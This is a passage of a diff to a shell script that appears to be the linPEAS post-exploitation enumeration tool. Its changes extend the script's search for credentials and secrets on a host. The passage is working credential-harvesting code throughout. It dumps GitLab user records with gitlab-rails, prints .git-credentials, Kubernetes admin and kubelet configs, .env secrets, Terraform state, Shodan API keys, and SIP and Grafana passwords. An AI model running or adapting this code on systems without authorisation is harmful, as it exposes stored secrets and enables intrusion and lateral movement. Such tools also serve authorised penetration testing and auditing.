"$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title "Searching uncommon passwd files (splunk)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then echo "passwd file: $f" | sed "s,$f,${SED_RED}," cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," @@ -3768,7 +4113,7 @@ fi ##-- SI) Gitlab if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then print_2title "Searching GitLab related files" - #Check gitlab-rails + # Check gitlab-rails if [ "$(command -v gitlab-rails)" ]; then echo "gitlab-rails was found. Trying to dump users..." gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," @@ -3781,7 +4126,7 @@ if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$ echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" echo "" fi - #Check gitlab files + # Check gitlab files printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if echo $f | grep -q secrets.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," @@ -3801,7 +4146,7 @@ fi if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then print_2title "Analyzing Github Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gitconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; fi @@ -3881,12 +4226,14 @@ if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then print_2title "Analyzing Kubernetes Files (limit 70)" (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED}," if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"bootstrap-kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bootstrap-kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "bootstrap-kubeconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bootstrap-kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet-kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet-kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet-kubeconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet-kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet.conf"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "kubelet.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubelet.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kube-proxy$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; find "$f" -name "admin.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,admin.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "controller-manager.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,controller-manager.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "scheduler.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,scheduler.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -3941,7 +4288,7 @@ fi if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then print_2title "Analyzing SNMP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*|^createUser" | sed -${E} "s,rocommunity|rwcommunity|extend.*|^createUser,${SED_RED},g"; done; echo ""; fi @@ -3965,7 +4312,7 @@ fi if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then print_2title "Analyzing Env Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env*"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.env.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB]|[pP][rR][iI][vV][aA][tT][eE]|[kK][eE][yY],${SED_RED},g"; done; echo ""; fi @@ -3986,6 +4333,7 @@ fi if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then print_2title "Analyzing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"vsftpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "vsftpd.conf"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "vsftpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vsftpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable" | sed -${E} "s,anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable|[yY][eE][sS],${SED_RED},g" | sed -${E} "s,\s[nN][oO]|=[nN][oO],${SED_GOOD},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; @@ -3997,12 +4345,43 @@ if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_VARNISH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Varnish Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VARNISH\" | grep -E \"varnish$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "varnish"; fi; fi; printf "%s" "$PSTORAGE_VARNISH" | grep -E "varnish$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,varnish$,${SED_RED},"; find "$f" -name "default.vcl" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.vcl,${SED_RED},"; done; echo "";find "$f" -name "secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,secret,${SED_RED},"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_APACHE_AIRFLOW" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Apache-Airflow Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"airflow\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "airflow.cfg"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "airflow\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,airflow\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,access_control_allow_headers|access_control_allow_methods|access_control_allow_origins|auth_backend|backend.default|google_key_path.*|password|username|flower_basic_auth.*|result_backend.*|ssl_cacert|ssl_cert|ssl_key|fernet_key.*|tls_ca|tls_cert|tls_key|ccache|google_key_path|smtp_password.*|smtp_user.*|cookie_samesite|cookie_secure|expose_config|expose_stacktrace|secret_key|x_frame_enabled,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"webserver_config\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "webserver_config.py"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "webserver_config\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,webserver_config\.py$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_X11" ] || [ "$DEBUG" ]; then + print_2title "Analyzing X11 Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_X11\" | grep -E \"\.Xauthority$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".Xauthority"; fi; fi; printf "%s" "$PSTORAGE_X11" | grep -E "\.Xauthority$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.Xauthority$,${SED_RED},"; done; echo ""; +fi + + if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Rocketchat Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo ""; fi +if [ "$PSTORAGE_RPCD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Rpcd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RPCD\" | grep -E \"rpcd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rpcd"; fi; fi; printf "%s" "$PSTORAGE_RPCD" | grep -E "rpcd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rpcd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.+|password.+,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_BITCOIN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Bitcoin Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BITCOIN\" | grep -E \"bitcoin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bitcoin.conf"; fi; fi; printf "%s" "$PSTORAGE_BITCOIN" | grep -E "bitcoin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bitcoin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user=.*|password=.*|auth=.*,${SED_RED},g"; done; echo ""; +fi + + if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then print_2title "Analyzing GlusterFS Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.pem$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.pem$,${SED_RED},"; done; echo ""; @@ -4011,6 +4390,13 @@ if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_TERRAFORM" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Terraform Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tfstate$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tfstate"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tfstate$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tfstate$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tf"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.tf$,${SED_RED},"; done; echo ""; +fi + + if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then print_2title "Analyzing Racoon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; @@ -4018,6 +4404,47 @@ if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_ROAD_RECON" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Road Recon Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ROAD_RECON\" | grep -E \"\.roadtools_auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".roadtools_auth"; fi; fi; printf "%s" "$PSTORAGE_ROAD_RECON" | grep -E "\.roadtools_auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.roadtools_auth$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,accessToken.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_GRAFANA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Grafana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GRAFANA\" | grep -E \"grafana\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "grafana.ini"; fi; fi; printf "%s" "$PSTORAGE_GRAFANA" | grep -E "grafana\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,grafana\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^;" | sed -${E} "s,admin.*|username.*|password:*|secret.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SIP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SIP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"sip\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sip.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "sip\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sip\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|allowguest.*=.*true,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"amportal\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "amportal.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "amportal\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,amportal\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PASS.*=.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"FreePBX\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreePBX.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "FreePBX\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreePBX\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E ".*AMPDB.*=.*" | sed -${E} "s,.*AMPDB.*=.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"Elastix\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Elastix.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "Elastix\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Elastix\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*pwd.*=.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_VIRTUAL_DISKS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Virtual Disks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhd"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhd$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhdx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhdx"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhdx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhdx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vmdk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vmdk"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vmdk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vmdk$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_GIT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Git Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GIT\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GIT" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_ATLANTIS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Atlantis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ATLANTIS\" | grep -E \"atlantis\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "atlantis.db"; fi; fi; printf "%s" "$PSTORAGE_ATLANTIS" | grep -E "atlantis\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,atlantis\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,CloneURL|Username,${SED_RED},g"; done; echo ""; +fi + + if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then print_2title "Analyzing Opera Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; @@ -4030,6 +4457,32 @@ if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_FAT_FREE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Fat-Free Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FAT_FREE\" | grep -E \"fat\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fat.config"; fi; fi; printf "%s" "$PSTORAGE_FAT_FREE" | grep -E "fat\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fat\.config$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "password.*" | sed -${E} "s,password.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SHODAN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Shodan Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SHODAN\" | grep -E \"api_key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "api_key"; fi; fi; printf "%s" "$PSTORAGE_SHODAN" | grep -E "api_key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,api_key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_CONCOURSE" 